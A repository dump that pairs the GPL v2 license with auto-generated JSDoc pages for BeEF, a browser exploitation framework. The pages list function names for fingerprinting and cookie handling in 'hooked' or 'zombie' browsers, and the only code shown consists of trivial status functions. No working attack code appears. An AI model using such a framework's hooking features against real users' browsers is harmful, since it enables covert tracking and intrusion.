Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
**************************************************************************** |
|
HTML | beef/docs/are.js.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: are.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: are.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2023 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* A series of functions that handle statuses, returns a number based on the function called.
* @namespace beef.are
*/
beef.are = {
/**
* A function for handling a success status
* @memberof beef.are
* @method status_success
* @return {number} 1
*/
status_success: function(){
return 1;
},
/**
* A function for handling an unknown status
* @memberof beef.are
* @method status_unknown
* @return {number} 0
*/
status_unknown: function(){
return 0;
},
/**
* A function for handling an error status
* @memberof beef.are
* @method status_error
* @return {number} -1
*/
status_error: function(){
return -1;
}
};
beef.regCmp("beef.are");
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.are.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: are</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: are</h1>
<section>
<header>
<h2>are</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>A series of functions that handle statuses, returns a number based on the function called.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".status_error"><span class="type-signature">(static) </span>status_error<span class="signature">()</span><span class="type-signature"> → {number}</span></h4>
<div class="description">
<p>A function for handling an error status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line31">line 31</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>-1</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
<h4 class="name" id=".status_success"><span class="type-signature">(static) </span>status_success<span class="signature">()</span><span class="type-signature"> → {number}</span></h4>
<div class="description">
<p>A function for handling a success status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line13">line 13</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>1</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
<h4 class="name" id=".status_unknown"><span class="type-signature">(static) </span>status_unknown<span class="signature">()</span><span class="type-signature"> → {number}</span></h4>
<div class="description">
<p>A function for handling an unknown status</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="are.js.html">are.js</a>, <a href="are.js.html#line22">line 22</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>0</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">number</span>
</dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.browser.cookie.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: cookie</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: cookie</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.browser.html">.browser</a>.</span>cookie</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides fuctions for working with cookies.
Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
Original author unknown.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".deleteCookie"><span class="type-signature">(static) </span>deleteCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line66">line 66</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getCookie"><span class="type-signature">(static) </span>getCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line35">line 35</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasPersistentCookies"><span class="type-signature">(static) </span>hasPersistentCookies<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line111">line 111</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasSessionCookies"><span class="type-signature">(static) </span>hasSessionCookies<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line102">line 102</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".setCookie"><span class="type-signature">(static) </span>setCookie<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".veganLol"><span class="type-signature">(static) </span>veganLol<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_cookie.js.html">browser/cookie.js</a>, <a href="browser_cookie.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.browser.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: browser</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: browser</h1>
<section>
<header>
<h2>browser</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Basic browser functions.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Namespaces</h3>
<dl>
<dt><a href="beef.browser.cookie.html">cookie</a></dt>
<dd></dd>
<dt><a href="beef.browser.popup.html">popup</a></dt>
<dd></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".changeFavicon"><span class="type-signature">(static) </span>changeFavicon<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Dynamically changes the favicon: works in Firefox, Chrome and Opera</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4540">line 4540</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".changePageTitle"><span class="type-signature">(static) </span>changePageTitle<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Changes page title</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4561">line 4561</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getBrowserEngine"><span class="type-signature">(static) </span>getBrowserEngine<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the underlying layout engine in use by the browser.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getBrowserLanguage"><span class="type-signature">(static) </span>getBrowserLanguage<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get the browser language</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4568">line 4568</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getBrowserName"><span class="type-signature">(static) </span>getBrowserName<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the type of user agent by hooked browser.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3620">line 3620</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getBrowserReportedName"><span class="type-signature">(static) </span>getBrowserReportedName<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the user agent that the browser is claiming to be.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line17">line 17</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getBrowserVersion"><span class="type-signature">(static) </span>getBrowserVersion<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the major version of the browser being used.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2730">line 2730</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getDetails"><span class="type-signature">(static) </span>getDetails<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Construct hash from browser details. This function is used to grab the browser details during the hooking process</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4183">line 4183</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getMaxConnections"><span class="type-signature">(static) </span>getMaxConnections<span class="signature">()</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>A function that gets the max number of simultaneous connections the
browser can make per origin, or globally on all origin.</p>
<p>This code is based on research from browserspy.dk</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4590">line 4590</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>A jQuery deferred object promise, which when resolved passes
the number of connections to the callback function as "this"</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".getPageBody"><span class="type-signature">(static) </span>getPageBody<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the page body HTML</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4528">line 4528</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getPageHead"><span class="type-signature">(static) </span>getPageHead<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the page head HTML</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4516">line 4516</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getPlugins"><span class="type-signature">(static) </span>getPlugins<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the list of plugins installed in the browser.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3916">line 3916</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getPluginsIE"><span class="type-signature">(static) </span>getPluginsIE<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns a list of plugins detected by IE. This is a hack because IE doesn't
support navigator.plugins</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4084">line 4084</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".getWindowSize"><span class="type-signature">(static) </span>getWindowSize<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns zombie browser window size.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4159">line 4159</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasActiveX"><span class="type-signature">(static) </span>hasActiveX<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns boolean value depending on whether the browser supports ActiveX</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line4349">line 4349</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasCors"><span class="type-signature">(static) </span>hasCors<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the browser supports CORS</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3876">line 3876</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".hasFlash"><span class="type-signature">(static) </span>hasFlash<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has flash installed and enabled.</p>
</div>
<dl class="details">
